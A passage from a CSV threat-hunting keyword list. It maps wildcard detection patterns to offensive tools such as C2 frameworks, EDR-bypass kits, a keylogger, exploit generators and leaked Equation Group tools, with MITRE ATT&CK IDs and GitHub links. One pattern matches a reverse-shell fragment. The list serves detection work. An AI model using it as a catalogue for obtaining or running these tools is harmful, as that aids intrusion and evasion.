security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*framework-114634acb84f8baa.js*,offensive_tool_keyword,nimplant,A light-weight first-stage C2 implant written in Nim,T1059-001 - T1027 - T1036,TA0002 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/chvancooten/NimPlant,1,1,N/A,10,10,641,85,2023-08-31T14:52:00Z,2023-02-13T13:42:39Z -*Framework-MobSF*,offensive_tool_keyword,Mobile-Security-Framework-MobSF,Mobile Security Framework (MobSF) is an automated. all-in-one mobile application (Android/iOS/Windows) pen-testing. malware analysis and security assessment framework capable of performing static and dynamic analysis. MobSF support mobile app binaries (APK. XAPK. IPA & APPX) along with zipped source code and provides REST APIs for seamless integration with your CI/CD or DevSecOps pipeline.The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.,T1565.001 - T1565.002 - T1565.003 - T1565.004 - T1523,TA0007 - TA0010 - TA0003,N/A,N/A,Frameworks,https://github.com/MobSF/Mobile-Security-Framework-MobSF,1,1,N/A,N/A,10,14942,3006,2023-10-03T20:48:09Z,2015-01-31T04:36:01Z -*frampton.py*,offensive_tool_keyword,frampton,PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible,T1055 - T1548.002 - T1129 - T1001,TA0002 - TA0003- TA0004 -TA0011,N/A,N/A,POST Exploitation tools,https://github.com/ins1gn1a/Frampton,1,1,N/A,N/A,1,69,16,2019-11-24T22:34:48Z,2019-10-29T00:22:14Z -*freenas_reverse_root_shell_csrf*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*Freeze_*_darwin_amd64*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*Freeze_*_linux_amd64*,offensive_tool_keyword,Freeze,Freeze is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls. and alternative execution methods,T1055 - T1055.001 - T1055.003 - T1055.004 - T1055.005 - T1055.006 - T1055.007 - T1055.008 - T1055.012 - T1055.013 - T1055.014 - T1055.015 - T1055.016 - T1055.017 - T1055.018 - T1055.019 - T1055.020 - T1055.021 - T1055.022 - T1055.023 - T1055.024 - T1055.025 - T1112,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze,1,1,N/A,N/A,10,1333,166,2023-08-18T17:25:07Z,2022-09-21T14:40:59Z -*Freeze-rs -*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,0,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs.exe*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. 
direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs_darwin_amd64*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs_linux_amd64*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*Freeze-rs_windows_amd64.exe*,offensive_tool_keyword,Freeze.rs,Freeze.rs is a payload toolkit for bypassing EDRs using suspended processes. direct syscalls written in RUST,T1548.004,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/optiv/Freeze.rs,1,1,N/A,N/A,7,665,70,2023-08-18T17:26:44Z,2023-05-03T16:04:47Z -*frida -l disableRoot.js -f owasp.mstg.uncrackable1*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*frida-ps -U*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*frida-trace -x ntdll.dll -i * -p 
*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -*frkngksl/NimExec*,offensive_tool_keyword,NimExec,Fileless Command Execution for Lateral Movement in Nim,T1021.006 - T1059.005 - T1564.001,TA0008 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/frkngksl/NimExec,1,1,N/A,N/A,4,307,33,2023-06-23T11:07:20Z,2023-04-21T19:46:53Z -*from .core import Fuzzer*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*from .wfuzz import *,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*from bofhound import *,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*from bofhound.ad import*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*from burp import *,offensive_tool_keyword,ActiveScanPlusPlus,ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead. 
it identifies application behaviour that may be of interest to advanced testers,T1583 - T1595 - T1190,TA0001 - TA0002 - TA0008,N/A,N/A,Network Exploitation tools,https://github.com/albinowax/ActiveScanPlusPlus,1,0,N/A,N/A,6,568,192,2022-11-15T13:47:31Z,2014-06-23T10:04:13Z -*from burp import*,offensive_tool_keyword,secretfinder,SecretFinder is a python script based on LinkFinder written to discover sensitive data like apikeys - accesstoken - authorizations - jwt..etc in JavaScript files,T1083 - T1081 - T1113,TA0003 - TA0002 - TA0007,N/A,N/A,Credential Access,https://github.com/m4ll0k/SecretFinder,1,0,N/A,N/A,10,1524,324,2023-06-13T00:49:58Z,2020-06-08T10:50:12Z -*from Exrop import *,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*from helpers.*_smbserver * import SimpleSMBServer*,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -*from holehe.core import*,offensive_tool_keyword,holehe,holehe allows you to check if the mail is used on different sites like twitter instagram and will retrieve information on sites with the forgotten password function.,T1598.004 - T1592.002 - T1598.001,TA0003 - TA0009,N/A,N/A,Reconnaissance,https://github.com/megadose/holehe,1,0,N/A,6,10,5659,655,2023-09-15T21:14:10Z,2020-06-25T23:03:02Z -*from merlin import *,offensive_tool_keyword,mythic,Cross-platform post-exploitation HTTP Command & Control agent written in golang,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008,N/A,N/A,C2,https://github.com/MythicAgents/merlin,1,0,N/A,10,10,57,10,2023-08-11T15:02:23Z,2021-01-25T12:36:46Z -*from pwn import *,offensive_tool_keyword,Exrop,Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints,T1554,TA0003,N/A,N/A,Exploitation tools,https://github.com/d4em0n/exrop,1,0,N/A,N/A,3,265,26,2020-02-21T08:01:06Z,2020-01-19T05:09:00Z -*from rarce import exploit*,offensive_tool_keyword,RaRCE,An easy to install and easy to run tool for generating exploit payloads for CVE-2023-38831 - WinRAR RCE before versions 6.23,T1068 - T1203 - T1059.003,TA0001 - TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/ignis-sec/CVE-2023-38831-RaRCE,1,0,N/A,9,2,108,18,2023-08-27T22:17:56Z,2023-08-27T21:49:37Z -*from shellcodes import *,offensive_tool_keyword,HRShell,HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.,T1021.002 - T1105 - T1059.001 - T1059.003 - T1064,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/chrispetrou/HRShell,1,0,N/A,10,10,244,73,2021-09-09T08:26:32Z,2019-08-20T15:24:46Z -*from wapitiCore.*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,0,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*frpc.exe -c frpc.in*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 
- T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*fsockopen(*0.0.0.0*4444*exec(*,offensive_tool_keyword,OMGLogger,Key logger which sends each and every key stroke of target remotely/locally.,T1056.001 - T1562.001,TA0004 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*FtpC2.exe*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,1,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*FtpC2.Tasks*,offensive_tool_keyword,SharpFtpC2,A Streamlined FTP-Driven Command and Control Conduit for Interconnecting Remote Systems.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/DarkCoderSc/SharpFtpC2,1,0,N/A,10,10,72,15,2023-06-23T08:40:08Z,2023-06-09T12:41:28Z -*ftp-server -u * -P * -p 2121*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*ftshell -*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data 
Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*ftshell.v3*,offensive_tool_keyword,EQGRP tools,Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell,T1055 - T1036 - T1038 - T1203 - T1059,TA0002 - TA0003 - TA0008,N/A,N/A,Data Exfiltration,https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1,1,0,N/A,N/A,1,0,1,2017-04-10T05:02:35Z,2017-04-10T06:59:29Z -*ftype *findstr *dfil*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ftype *findstr *SHCm*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ftype *findstr dfil*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string dfil - hidden objectif is to find cmdfile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*ftype *findstr SHCm*,greyware_tool_keyword,ftype,will return the file type information for file types that include the string SHCm - hidden objectif is to find SHCmdFile string,T1033 - T1059 - T1083,TA0007 - TA0002,N/A,N/A,Reconnaissance,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Fuck-Etw-main*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*fucksetuptools*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - 
T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*FuckThatPacker.*,offensive_tool_keyword,cobaltstrike,A simple python packer to easily bypass Windows Defender,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 
Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Unknow101/FuckThatPacker,1,1,N/A,10,10,612,91,2022-04-03T18:20:01Z,2020-08-13T07:26:07Z -*FudgeC2.*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*FudgeC2Viewer.py*,offensive_tool_keyword,FudgeC2,FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.,T1021.002 - T1105 - T1059.001 - T1059.003,TA0008 - TA0011 - TA0002,N/A,N/A,C2,https://github.com/Ziconius/FudgeC2,1,1,N/A,10,10,237,54,2023-05-01T21:13:56Z,2018-09-09T21:05:21Z -*fuff *-input-shell*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*fuff *-scraperfile*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*fuff *-scrapers*,offensive_tool_keyword,ffuf,Fast web fuzzer written in Go,T1110 - T1550,TA0006 - TA0008,N/A,N/A,Reconnaissance,https://github.com/ffuf/ffuf,1,0,N/A,N/A,10,10177,1154,2023-09-20T16:02:23Z,2018-11-08T09:25:49Z -*FULLSHADE/WindowsExploitationResources*,offensive_tool_keyword,WindowsExploitationResources,Resources for Windows exploit development,T1203 - T1210 - T1212 - T1216 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/FULLSHADE/WindowsExploitationResources,1,1,N/A,N/A,10,1351,319,2021-12-20T00:21:07Z,2020-05-26T07:19:54Z -*func_get_powershell_dll*,offensive_tool_keyword,GreatSCT,The project is called 
Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*func_install_wine_dotnettojscript*,offensive_tool_keyword,GreatSCT,The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.,T1055 - T1112 - T1189 - T1205,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/GreatSCT/GreatSCT,1,1,N/A,N/A,10,1103,214,2021-02-10T22:05:27Z,2017-05-12T03:30:41Z -*function psenum*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*function Use-Zeus*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*FunnyWolf/pystinger*,offensive_tool_keyword,cobaltstrike,Bypass firewall for traffic forwarding using webshell. Pystinger implements SOCK4 proxy and port mapping through webshell. 
It can be directly used by metasploit-framework - viper- cobalt strike for session online.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/FunnyWolf/pystinger,1,1,N/A,10,10,1283,212,2021-09-29T13:13:43Z,2019-09-29T05:23:54Z -*fuse_evil.*,offensive_tool_keyword,POC,Exploit for CVE-2022-27666,T1550 - T1555 - T1212 - T1558,TA0005,N/A,N/A,Exploitation tools,https://github.com/plummm/CVE-2022-27666,1,1,N/A,N/A,3,203,41,2022-03-28T18:21:00Z,2022-03-23T22:54:28Z -*fuse_lowlevel.h*,offensive_tool_keyword,POC,This repo contains demo exploits for CVE-2022-0185,T1210 - T1222 - T1506 - T1068,TA0002 - TA0007 - TA0040,N/A,N/A,Exploitation tools,https://github.com/Crusaders-of-Rust/CVE-2022-0185,1,0,N/A,N/A,4,364,55,2022-04-25T04:11:33Z,2022-01-19T06:19:38Z -"*fuxploider --url * --not-regex ""wrong file type""*",offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - 
?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*fuxploider*,offensive_tool_keyword,fuxploider,Fuxploider is an open source penetration testing tool that automates the process of detecting and exploiting file upload forms flaws. This tool is able to detect the file types allowed to be uploaded and is able to detect which technique will work best to upload web shells or any malicious file on the desired web server.,T1526 - T1505 - T1506 - T1574,TA0006 - TA0008,N/A,N/A,Web Attacks,https://github.com/almandin/fuxploider,1,0,N/A,N/A,10,2667,485,2023-04-16T19:57:12Z,2017-07-14T09:30:06Z -*fuzz_option.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*fuzzdb*,offensive_tool_keyword,fuzzdb,FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic application security testing. Its the first and most comprehensive open dictionary of fault injection patterns. predictable resource locations. 
and regex for matching server responses.,T1190 - T1191 - T1192 - T1193 - T1197,TA0002 - TA0008,N/A,N/A,Web Attacks,https://github.com/fuzzdb-project/fuzzdb,1,0,N/A,N/A,10,7641,2094,2023-02-21T15:21:06Z,2015-09-10T17:54:31Z -*fuzzfactory.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*fuzzrequest.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*FuzzySecurity/Dendrobate*,offensive_tool_keyword,Dendrobate,Dendrobate is a framework that facilitates the development of payloads that hook unmanaged code through managed .NET code,T1055.012 - T1059.001 - T1070.004,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Dendrobate,1,1,N/A,10,2,122,27,2021-11-19T12:18:50Z,2021-02-15T11:15:51Z -*FuzzySecurity/Sharp-Suite*,offensive_tool_keyword,Sharp-Suite,C# offensive tools,T1027 - T1059.001 - T1562.001 - T1136.001,TA0004 - TA0005 - TA0040 - TA0002,N/A,N/A,Exploitation tools,https://github.com/FuzzySecurity/Sharp-Suite,1,0,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -*fw_walk disable*,offensive_tool_keyword,cobaltstrike,A BOF to interact with COM objects associated with the Windows software firewall.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - 